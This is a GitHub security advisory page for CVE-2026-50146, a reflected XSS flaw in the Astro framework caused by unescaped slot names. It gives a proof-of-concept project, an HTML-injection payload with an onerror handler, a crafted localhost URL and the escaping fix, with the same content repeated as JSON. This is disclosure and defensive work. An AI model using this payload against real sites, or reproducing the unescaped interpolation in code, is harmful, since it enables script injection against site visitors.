GHSA-8HV8-536X-4WQP

Vulnerability from github – Published: 2026-06-16 14:05 – Updated: 2026-06-16 14:05
VLAI
Summary
Astro: Reflected XSS via unescaped slot name
Details

Summary

When a component uses a client:* directive, Astro inserts named slot content into a data-astro-template attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.

This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.

Vulnerable Code

packages/astro/src/runtime/server/render/component.ts:371:376

// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>`

I found that key is interpolated directly into the attribute value without proper escaping.

Proof of Concept

For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0.

astro.config.mjs

import react from '@astrojs/react';
import node from '@astrojs/node';
import { defineConfig } from 'astro/config';
export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
  integrations: [react()],
});

src/pages/index.astro

---
import Wrapper from '../components/Wrapper.jsx';
const slotName = Astro.url.searchParams.get('tab') ?? 'default';
---
<html><body>
  <Wrapper client:load>
    <div slot={slotName}>content</div>
  </Wrapper>
</body></html>

src/components/Wrapper.jsx

export default function Wrapper() { return null; }

Payload:

abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!--

Accessing this URL will trigger the popup.

http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--

image

This will render in html.

<template data-astro-template="abc"></template></astro-island>
<img src=x onerror=confirm(document.domain)><!--">content</template>

Fix

I suggest leveraging the existing escape function on the slot name.

// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>`

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "astro"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50146"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T14:05:06Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nWhen a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.\n\nThis is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.\n\n## Vulnerable Code\n\n`packages/astro/src/runtime/server/render/component.ts:371:376`\n\n```ts\n// component.ts:371\n`\u003ctemplate data-astro-template${key !== \u0027default\u0027 ? `=\"${key}\"` : \u0027\u0027}\u003e${children[key]}\u003c/template\u003e`\n```\n\nI found that key is interpolated directly into the attribute value without proper escaping.\n\n## Proof of Concept\n\nFor the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0.\n\n**`astro.config.mjs`**\n```js\nimport react from \u0027@astrojs/react\u0027;\nimport node from \u0027@astrojs/node\u0027;\nimport { defineConfig } from \u0027astro/config\u0027;\nexport default defineConfig({\n  output: \u0027server\u0027,\n  adapter: node({ mode: \u0027standalone\u0027 }),\n  integrations: [react()],\n});\n```\n\n**`src/pages/index.astro`**\n```astro\n---\nimport Wrapper from \u0027../components/Wrapper.jsx\u0027;\nconst slotName = Astro.url.searchParams.get(\u0027tab\u0027) ?? \u0027default\u0027;\n---\n\u003chtml\u003e\u003cbody\u003e\n  \u003cWrapper client:load\u003e\n    \u003cdiv slot={slotName}\u003econtent\u003c/div\u003e\n  \u003c/Wrapper\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\n**`src/components/Wrapper.jsx`**\n```jsx\nexport default function Wrapper() { return null; }\n```\n\n**Payload:**\n```\nabc\"\u003e\u003c/template\u003e\u003c/astro-island\u003e\u003cimg src=x onerror=confirm(document.domain)\u003e\u003c!--\n```\nAccessing this URL will trigger the popup.\n\nhttp://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--\n\n\n\n\u003cimg width=\"1268\" height=\"592\" alt=\"image\" src=\"https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7\" /\u003e\n\n\n\nThis will render in html.\n\n```html\n\u003ctemplate data-astro-template=\"abc\"\u003e\u003c/template\u003e\u003c/astro-island\u003e\n\u003cimg src=x onerror=confirm(document.domain)\u003e\u003c!--\"\u003econtent\u003c/template\u003e\n```\n\n## Fix\n\nI suggest leveraging the existing escape function on the slot name.\n\n```ts\n// component.ts:371\n`\u003ctemplate data-astro-template${key !== \u0027default\u0027 ? `=\"${escapeHTML(String(key))}\"` : \u0027\u0027}\u003e${children[key]}\u003c/template\u003e`\n```\n\n---",
  "id": "GHSA-8hv8-536x-4wqp",
  "modified": "2026-06-16T14:05:06Z",
  "published": "2026-06-16T14:05:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-8hv8-536x-4wqp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/withastro/astro"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Astro: Reflected XSS via unescaped slot name"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…